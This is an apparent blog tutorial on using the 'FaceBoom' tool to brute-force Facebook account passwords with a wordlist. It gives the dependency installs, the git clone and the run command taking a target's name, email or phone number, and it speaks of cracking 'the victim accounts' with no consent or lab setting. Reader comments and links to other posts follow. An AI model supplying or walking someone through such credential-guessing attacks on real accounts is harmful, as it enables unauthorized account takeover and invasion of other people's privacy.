Sponsored
Dictionary and Bruteforce

Facebook Account Hacking Using Bruteforce

Hey Folks, in this tutorial we are going to talk about an another facebook brute forcing tool called “FaceBoom“. As we know that brute force attack is a well known cracking method in which involves ‘guessing’ username and passwords to gain unauthorized access to a system. Likewise, we will perform bruteforce attacks on facebook accounts using this tool to get the right credentials.

Lte’s take a look 🙂 !!

Install Dependencies

As we know how important python and pip tools are to control this tool, so you will need to install both tools using the following command.

apt install python && apt install python3 && pkg install python && pkg install python3 && apt install python-pip && apt install python3-pip && pkg install python-pip && pkg install python3-pip

Installation

One more dependency you have to download. After that download this tool by using the git command, go the directory and boot this tool by using the python command.

pip install mechanize
git clone https://github.com/Oseid/FaceBoom.git
cd FaceBoom/
python3 faceboom.py

Usage Guide

By execute the following command you can check the usage of this tool.

python3 faceboom.py

Brute Force Attack

This tool looks very interesting and at the same time it works fine. Understand the following command, change the details according to your and execute it.

Usage 🙂 !! python3 faceboom.py -t < name/email/number > -w < wordlist >

Nice 🙂 !! As you can see it has got the correct password to enter the victim accounts and thus we can crack the Facebook account password using the last dictionary.

About the Author
Shubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.
Sponsored

View Comments

  • I'm impressed, I must say. Seldom do I come across a blog that's both educative and amusing, and let me tell you, you've hit
    the nail on the head. The problem is something that too few folks are speaking intelligently about.
    Now i'm very happy I came across this in my hunt for something concerning this.

  • After successful attempt facebook asks for verification and your done can't get through it
    Tried on my own ID

Recent Posts

Termux Cheat Sheet for Hackers

Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…

1 month ago

Cracking the X-Factor in Cybersecurity: How Humans are Protecting the Systems?

Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…

8 months ago

Cariddi – Hidden Endpoint Finder for Bug Hunting

Hey Folks, we are back today after such a long break, but don't worry we…

2 years ago

API Security Testing 101: Know Everything About API Security Testing!

The security of your API should be one of the top priorities of companies. Without…

2 years ago

7 Best Tools for Web Penetration Testing: Comprehensive Details

Hey Folks, In today's business world, it is essential to have an online presence. However,…

2 years ago

Cyber Security Audits: Everything You Need to Know About It

Hey Folks, Is your business prepared in case of a cyber attack? Many companies don't…

2 years ago
Sponsored

This website uses cookies.